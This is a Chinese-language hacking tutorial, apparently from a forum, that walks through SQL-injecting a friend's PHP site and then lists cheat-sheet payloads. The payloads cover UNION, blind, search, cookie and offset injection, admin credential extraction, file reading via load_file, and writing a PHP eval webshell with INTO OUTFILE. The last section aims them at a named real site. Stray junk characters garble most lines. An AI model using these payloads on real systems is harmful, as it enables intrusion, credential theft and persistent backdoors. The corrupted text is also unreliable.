我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~" G; K# Z. v+ p3 |( L6 }0 M* a
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
! B: c! m, g% | J我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。
4 v" o P% Q" V% Y2 h5 l; H; x如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)
' Q% ~/ k. t+ w1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)3 y4 X5 q' ^6 k2 r k/ c1 s! E. ?4 q
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:/ Z) R; [4 O$ R8 e- ^
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
3 a8 u* o& F9 w0 I. |+ }/ A. {/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入# y' Y) u3 W3 `* E( a0 F8 C
' H C9 e& P# A# U/ c4 X
2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入, _0 M; N0 F( S( a: U; U
3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3 ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意# M5 \# N. e# W
4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息+ y, C+ A; _) N4 N& f
5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。
" Y% `' ` l, H o有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,
/ b3 R6 O$ c( `6 O2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。& V0 G* H, S5 X$ s: }+ X( m6 m* v
我就用的是第二个思路,
0 C- Q C8 i7 \提交and 1=2 union select 1,2,3,4,table_name,6,7,8 from information_schema.tables where table_schema=database() limit 0,1-- / ^! A3 R7 }# Q
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,
6 }6 J! c* U5 z# r# \提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--* n- T# B; q$ q0 H
注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。* O) J; x2 t' K# b1 P
7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????6 E6 }! O& I6 x8 e. [) Y
是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd..... {* j1 i$ l# M) R: B" s
提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --# c7 ~9 h7 A7 f" J) s
然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,
3 `; }1 o1 K& u) y% C; T* F' v( E, t调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......
( J) T; W* Y9 ] U' S6 F下面是一些很普遍注入方式资料:
/ f) P% g- L; _. Z" w) g注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='7 \7 j- z$ H/ p% s3 L' M
拆半法
2 ~! y, n" ]$ P: j######################################
" M$ M0 ~2 B: Q/ p5 c8 Sand exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。0 \" w0 p; v# U& B
and exists (select * from admin)
7 S# C& V" ]1 i0 t) T, S; ?* qand exists(select id from admin)
1 P( Y1 @2 Q% N" d+ Q" n) }and exists(select id from admin where id=1): O9 _6 d; w- A b. S
and exists(select id from admin where id>1)
% U6 v( @; w' D8 N% B然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
/ R+ _0 W' \. q9 |" ^; P# gand exists (select username from admin)& ^; ]( a( p: o
and exists (select password from admin)
; n2 `4 A& N" u: E* d/ V4 eand exists (select id from admin where len(username)<10 and id=1)
: W' j" R$ G6 y% I7 z; ]and exists (select id from admin where len(username)>5 and id=1)
5 D# V# J7 O* }% E8 o: Nand exists (select id from admin where len(username)=6 and id=1)
# C$ _1 y* y7 ?: N Yand exists (select id from admin where len(password)<10 and id=1)
' j) n0 T2 ^3 B( T* n4 U2 Gand exists (select id from admin where len(password)>5 and id=1)
4 u9 G4 y- y; e- aand exists (select id from admin where len(password)=7 and id=1)
/ ?. c4 F- f* s' o. [0 tand (select top 1 asc(mid(username,1,1)) from admin)=97* `6 S |" u3 j3 p$ P
返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。+ R7 _3 {" |/ {; Z, H' j' G" ~
猜第二位把username,1,1改成username,2,1就可以了。' R. B5 l1 _* i* k4 _) j/ v' c1 c5 {
猜密码把username改成password就OK了
9 O( L* B+ C2 a: M5 x##################################################
" S8 x/ S1 }) x" Y, g搜索型注入9 j5 @& Q5 W$ T+ m7 U
##################################
# L" g! x* Z2 m' Q2 x%' and 1=1 and '%'='. f- E) C! j! [& {9 L$ B
%' and exists (select * from admin) and '%'='
- A ]+ C2 f& \# S2 S- P%' and exists(select id from admin where id=1) and '%'='
* B" p5 G9 o' j" {7 `$ O%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
?6 E. t3 [+ e6 I1 y3 |( B%' and exists (select id from admin where len(password)=7 and id=1) and '%'='* d5 G5 O% S2 U3 H5 ~
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='$ H% b6 {+ X/ g
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='& x% R; A* b; w2 ~* O
对于MSSQL数据库,后面可以吧 and '%'='换成--
" b0 s. E8 m% g. G4 v; E) g还有一点搜索型注入也可以使用union语句。
2 e" ^# v# M# c8 @+ }0 S2 M2 b% w########################################################
( q7 o H T- }) h. S" U联合查询。! ~- E" M8 u( s" L- `
#####################################
! B3 k5 a' D2 i- I: morder by 10( N9 Z/ r& K q* d0 x; F! H
and 1=2 union select 1,2,3,4,5,6,7,8,9,10
6 @/ P [8 t: {and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin5 U* {; p q$ C8 H& ~! O! {
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
' W6 G1 @9 V0 M很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
) Y, d1 [. L) F' O5 g( ?( A4 T###################################
. g8 e. c: Y( @! Wcookie注入
" E1 c& O3 z7 b! l###############################9 i( o# u' y' }: z
http://www.******.com/shownews.asp?id=127. p" Q: F& d# k- U* ]
http://www.******.com/shownews.asp# S1 K# p' H3 ]$ |9 ?* ~
alert(="id="+escape("127"));
% O" T3 e( F! a balert(="id="+escape("127 and 1=1"));9 M. q( v+ A2 T/ i0 F" [. W1 x( \
alert(="id="+escape("127 order by 10"));
- u2 C# F! Q# B8 ^7 H5 I9 malert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
% Z4 }/ S& e4 k- {6 calert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));" f; ], k0 u( b" K7 b2 e
这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。* i4 z" d: J9 z- ]2 w, [+ X
###################################, C8 \: s$ b! A0 Z9 a
偏移注入
, n0 ]! L2 M4 o4 T2 g###########################################################. ? a1 E3 ^( A9 ~6 t+ \
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
* H$ K' f+ q, W# c. |6 D1 {4 y% wunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
3 [4 x4 A$ o+ V( H# F5 Munion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
3 k1 L- I/ z* L6 u9 V9 S# i$ S& S- punion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
- S5 C3 M2 `& ~* h" f( dunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)* n$ G- n, z2 L2 Z5 s( D) d& S2 C, q
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)4 C/ G1 u- l& e( P; L
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on0 M4 V! j, e T
a.id=d.id)9 v: D! d9 w. Y7 M2 g6 `' q3 E
and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
T. G( s8 [7 c7 K! Dand 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
4 J- s7 `4 n( l* v. B9 m& b2 h8 e 4 o/ R R& o& f! b
============================================================================================================0 z, v: L2 k% |; y+ O r: o. t
1.判断版本
% [ f9 E* A+ x* Y) N! b% Band ord(mid(version(),1,1))>51
A3 D( ~& [+ T3 q: h返回正常,说明大于4.0版本,支持ounion查询
( ?/ K- c n W$ M% W! h2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解8 s7 w) A, P, g8 A5 p' s; O
and 2=4 union select 1,2,3,4,5,6,7,8,9--! T! s8 m" V2 Q* r
3.查看数据库版本及当前用户,) n- I8 }+ Z: @4 `0 |& [0 L* T
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--; p+ ?7 L/ _2 L; p, g* e
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,2 U1 S; [& N. G4 ]+ o, B
4.判断有没有写权限
& W- X% ^" F/ ^; n# S* Jand (select count(*) from MySQL.user)>0-- J8 e5 z1 i) `+ R
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
( J- @" c: q% Z! Q' y6 q2 N用不了这个命令,就学习土耳其黑客手法,如下
9 f/ |0 d" c: r% f; Vand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--/ G! x/ h# ]5 O6 G: |3 L
6.爆表,爆库
2 X9 D9 {9 ^1 vand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
, S* h8 Z+ g7 j: |: N2 o7.爆列名,爆表
% h, U8 O4 X' T. Dand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--: t1 F9 x/ } L$ E3 M% {
8.查询字段数,直接用limit N,1去查询,直接N到报错为止。
0 x. C2 G ^' A" ^) S3 W. Vand+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
* s: k, {$ T: V1 E: y" L9.爆字段内容
& k8 h" [8 r- o0 g. o3 Mand+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--# q, }, _! R) S0 _: J+ r, s
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1-- |